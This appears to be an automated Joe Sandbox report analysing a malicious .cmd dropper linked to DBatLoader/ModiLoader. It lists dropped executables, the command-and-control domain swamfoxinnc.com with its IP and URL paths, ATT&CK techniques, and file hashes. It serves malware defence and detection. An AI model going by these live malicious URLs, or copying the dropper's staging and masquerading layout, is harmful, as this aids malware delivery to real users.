Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF6BF3F8654 GetSystemTime,SystemTimeToFileTime,

3_2_00007FF6BF3F8654

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7F706950C ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,ConvertSidToStringSidW,GetLastError,LocalFree,LocalFree,

6_2_00007FF7F706950C

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF6BF3D586C GetVersion,

3_2_00007FF6BF3D586C

Source: Amcache.hve.17.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70A5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,	6_2_00007FF7F70A5648
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F70854A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,	6_2_00007FF7F70854A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F709E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,	6_2_00007FF7F709E568
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7F708227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,	6_2_00007FF7F708227C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	21 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	1 System Network Connections Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Install Root Certificate	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	35 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Masquerading	DCSync	341 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Svcrhpjadgyclc.cmd	21%	ReversingLabs	Script-BAT.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\spoolsv.COM	100%	Avira	HEUR/AGEN.1326111
C:\Users\Public\Libraries\spoolsv.COM	55%	ReversingLabs	Win32.Trojan.ModiLoader
C:\Users\Public\alpha.exe	0%	ReversingLabs
C:\Users\Public\kn.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_Svcr	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_Svcrhpjadgy	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_Svcrhpjadgyvf	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_Svcrhpjadgy8)	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_SvcrhpjadgyF)	0%	Avira URL Cloud	safe
https://swamfoxinnc.com:443/233_Svcrhpjadgy	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/L?	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_SvcrhpjadgyBSX9S-	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/d	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/4?	0%	Avira URL Cloud	safe
https://%ws/%ws_%ws_%ws/service.svc/%ws	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_Svcrhpjadgyn):	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_SvcrhpjadgyW	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/rx	0%	Avira URL Cloud	safe
https://swamfoxinnc.com/233_SvcrhpjadgyBSX9S	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
swamfoxinnc.com	176.123.5.143	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://swamfoxinnc.com/233_Svcrhpjadgy	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://swamfoxinnc.com/L?	spoolsv.COM, 00000009.00000002.2463208241.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP	kn.exe, 00000006.00000000.1712966153.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1717235045.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1720044377.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1728999472.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/%s/oauth2/authorize	kn.exe	false		high
https://swamfoxinnc.com:443/233_Svcrhpjadgy	spoolsv.COM, 00000009.00000002.2463208241.00000000005D6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/%s/oauth2/token	kn.exe	false		high
https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah	kn.exe, 00000006.00000000.1712966153.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1717235045.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1720044377.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1728999472.00007FF7F717E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	false		high
https://swamfoxinnc.com/d	spoolsv.COM, 00000009.00000002.2463208241.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2463208241.000000000053F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/233_SvcrhpjadgyBSX9S-	spoolsv.COM, 00000009.00000002.2463208241.0000000000587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/233_SvcrhpjadgyF)	spoolsv.COM, 00000009.00000003.1917475501.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1882525164.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2463208241.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/233_Svcr	spoolsv.COM, 00000009.00000002.2478928383.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2478928383.000000002089D000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc	kn.exe	false		high
https://www.aapanel.com/new/download.html?invite_code=aapanele	spoolsv.COM, 00000009.00000003.1810662401.0000000021555000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1915371954.0000000021590000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1844407032.0000000021575000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1880419222.00000000215AC000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1812685797.0000000000601000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2480257189.0000000021550000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1917379923.000000000060F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1844555436.00000000215C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1812685797.0000000000612000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1844555436.0000000021575000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1882477795.000000000060F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1778039383.0000000000614000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1810750460.0000000000610000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1915371954.00000000215C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2478928383.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1775999853.0000000021551000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1844743796.00000000215C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1844489071.00000000215AC000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1778039383.0000000000612000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2480257189.000000002155C000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1844489071.0000000021590000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.17.dr	false		high
https://swamfoxinnc.com/233_Svcrhpjadgyvf	spoolsv.COM, 00000009.00000002.2463208241.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1846816428.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1917475501.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1882525164.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1812755723.00000000005DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/233_Svcrhpjadgy8)	spoolsv.COM, 00000009.00000003.1812755723.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/233_SvcrhpjadgyBSX9S	spoolsv.COM, 00000009.00000002.2463208241.0000000000587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/4?	spoolsv.COM, 00000009.00000002.2463208241.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://%ws/%ws_%ws_%ws/service.svc/%ws	kn.exe	false	Avira URL Cloud: safe	unknown
https://enterpriseregistration.windows.net/EnrollmentServer/device/	kn.exe	false		high
https://swamfoxinnc.com/233_SvcrhpjadgyW	spoolsv.COM, 00000009.00000002.2463208241.0000000000587000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://enterpriseregistration.windows.net/EnrollmentServer/key/	kn.exe	false		high
https://swamfoxinnc.com/rx	spoolsv.COM, 00000009.00000003.1812755723.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1917475501.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1882525164.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1846816428.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000002.2463208241.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://swamfoxinnc.com/233_Svcrhpjadgyn):	spoolsv.COM, 00000009.00000002.2463208241.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 00000009.00000003.1846816428.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.123.5.143	swamfoxinnc.com	Moldova Republic of		200019	ALEXHOSTMD	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578216
Start date and time:	2024-12-19 12:38:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Svcrhpjadgyclc.cmd
Detection:	MAL
Classification:	mal100.bank.troj.evad.winCMD@23/16@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 59 Number of non-executed functions: 211
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.12.23.50, 20.190.147.1, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:39:15	API Interceptor	6x Sleep call for process: spoolsv.COM modified
06:40:27	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ALEXHOSTMD	armv6l.elf	Get hash	malicious	Unknown	Browse	45.84.8.182
	NLRpif3sEB.exe	Get hash	malicious	Unknown	Browse	213.226.100.197
	NLRpif3sEB.exe	Get hash	malicious	Unknown	Browse	213.226.100.197
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	176.123.5.14
	http://server.citierupticx.com/specId/product-mje%EF%BC%A0ml.avio.co.jp	Get hash	malicious	HTMLPhisher	Browse	91.208.197.216
	2024-11 eStmt 5563019.exe	Get hash	malicious	ScreenConnect Tool	Browse	176.123.1.130
	otis.exe	Get hash	malicious	Unknown	Browse	91.132.92.231
	otis.exe	Get hash	malicious	Unknown	Browse	91.132.92.231
	armv5l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247
	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	91.208.162.247

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	176.123.5.143
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	176.123.5.143
	MFQbv2Yuzv.exe	Get hash	malicious	LummaC, Stealc	Browse	176.123.5.143
	Y41xQGmT37.exe	Get hash	malicious	LummaC, Stealc	Browse	176.123.5.143
	O3u9C8cpzl.exe	Get hash	malicious	LummaC, Stealc	Browse	176.123.5.143
	niwvNnBk2p.exe	Get hash	malicious	LummaC, Stealc	Browse	176.123.5.143
	661fW9gxDp.exe	Get hash	malicious	LummaC	Browse	176.123.5.143
	S6oj0LoSiL.exe	Get hash	malicious	LummaC	Browse	176.123.5.143
	SEPTobn3BR.exe	Get hash	malicious	Remcos, DBatLoader	Browse	176.123.5.143
	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Get hash	malicious	DBatLoader, FormBook	Browse	176.123.5.143

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\alpha.exe	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	1x40 CONTAINER.PDF-.bat	Get hash	malicious	Unknown	Browse
	1x40 CONTAINER.PDF-.bat	Get hash	malicious	Unknown	Browse
	saw.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	A1 igazol#U00e1s.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	Documentazione_Doganale_richieste_di_copia.cmd	Get hash	malicious	DBatLoader	Browse
	78326473_PDF.cmd	Get hash	malicious	DBatLoader	Browse
	iuhmzvlH.cmd	Get hash	malicious	Unknown	Browse
	USD470900_COPY_800BLHSBC882001.PDF.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_spoolsv.COM_23799b85b04ea52acc91698859bbee1a943bf656_7707c8da_b026925b-3c0e-456e-af2b-f56d36bd51b3\Report.wer

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0931134910558558
Encrypted:	false
SSDEEP:	192:AT1rliB5iRb0BU/4jJHyfWidzuiFmZ24IO8I:arlk5iRoBU/4j+dzuiFmY4IO8I
MD5:	259FB165FEA0E37DA460099D8205BED4
SHA1:	675E5ED006D6E143C708E3292D8F47E67022C501
SHA-256:	E4F2A72696731758DA38FE46A0EA460DAC1EDC8D08C85DC8DFE65A237D8742B6
SHA-512:	A238682EBE42F2259F1B6529FAD167632438C88B685AC4EEDED2DD45BD0DA3DD6B068347E823AC198709567D39A1332BFA4D8C5F720E13B3AF019235416C9B2B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.8.2.0.0.4.8.0.2.4.4.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.8.2.0.0.5.3.9.2.4.4.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.2.6.9.2.5.b.-.3.c.0.e.-.4.5.6.e.-.a.f.2.b.-.f.5.6.d.3.6.b.d.5.1.b.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.0.b.d.e.a.5.-.a.4.f.e.-.4.f.f.b.-.8.5.5.c.-.e.8.2.b.4.1.5.a.3.2.4.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.p.o.o.l.s.v...C.O.M.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.9.4.-.0.0.0.1.-.0.0.1.4.-.d.5.5.7.-.6.c.a.1.0.a.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.4.7.a.0.0.c.0.e.7.1.0.6.4.4.9.1.1.9.1.1.b.0.d.6.3.4.b.e.f.8.f.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.5.5.6.6.c.d.d.f.b.4.b.9.9.e.8.2.a.6.b.a.b.d.b.d.4.5.3.6.a.2.4.e.8.f.6.f.7.3.!.s.p.o.o.l.s.v...C.O.M.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF351.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Dec 19 11:40:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	143420
Entropy (8bit):	2.0463963656703386
Encrypted:	false
SSDEEP:	384:EVqGYxeIgaJ3hAfpf4DycdDrK9s97oKAmQHZyRA0Xvl3pt7nTis4:EwzwbyRAfVUy+Cw0LAP/pTiZ
MD5:	F67C61ADD570ECFBF6E83B1CF1D09967
SHA1:	C901DDF5E9C1B52BE7DAE7F76F931CB981DF4054
SHA-256:	EF0DC534E2AA65E5FE7E10316AE72F699CA312AAA4CD8C33D5F963D2E1E67488
SHA-512:	B15173D3F3683E567409F646BF6CF19C363B135ECA1C129815D547066587BBFDFF5A8D8EC4DEBF6ED475FD7F712F12D033478A904B90EDD5B3FA6AAAE462CE34
Malicious:	false
Preview:	MDMP..a..... .........dg........................ ................&...........f..........`.......8...........T............T...............,..........................................................................................eJ......h/......GenuineIntel............T.............dg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF48B.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8284
Entropy (8bit):	3.6924062047490716
Encrypted:	false
SSDEEP:	192:R6l7wVeJvO6Yj6YbyS8gmfT4cu/pr+89bkLsforMm:R6lXJW6Yj6YOS8gmfT4culkQfu
MD5:	CD21DF63E0490DA22D410E965A275FBF
SHA1:	5A91A58239D42361624FD924B23AA7CE8385D915
SHA-256:	E4088D95D6F1C6F5A14C1C36F48C138D294477B91079B2D80504D59CA43BF343
SHA-512:	8A616F18C657527762919E2319F05D72AE419757003CA1752120B1852007ABA26ED23461FFA7679580AC6931B1B748AEC3AC6CAC4D8A735290B621082C53EEDE
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF509.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4580
Entropy (8bit):	4.463152367432174
Encrypted:	false
SSDEEP:	48:cvIwWl8zsXJg77aI9vcWpW8VY5Ym8M4JQJFYt+q8bQVMQEh2dd:uIjf5I7FV7VVJHBVMQEh2dd
MD5:	C25DEB683A60067A7BC1C70F90E9EF6B
SHA1:	72E9E1D59C10E9425E1470D7E7F2FB6501AE4791
SHA-256:	60C4C25EF4A462953194E98814AAEBD0A9C6A244F774EA23558272EDA12C99B0
SHA-512:	CE3FE711913BEE19161E8C645FBD7C0858AA5E17FB615DE264DBDB3F8BEB5044F30E39D97E9BCC16AEC4623CD5B3A8FFBE318E16779215C04226C03E2D3608CA
Malicious:	false
